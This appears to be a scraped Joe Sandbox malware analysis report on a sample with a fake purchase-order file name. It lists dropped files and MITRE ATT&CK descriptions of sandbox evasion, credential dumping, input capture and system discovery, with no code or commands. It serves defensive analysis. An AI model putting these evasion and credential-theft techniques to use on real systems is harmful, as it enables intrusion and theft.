Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Windows Analysis Report
RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre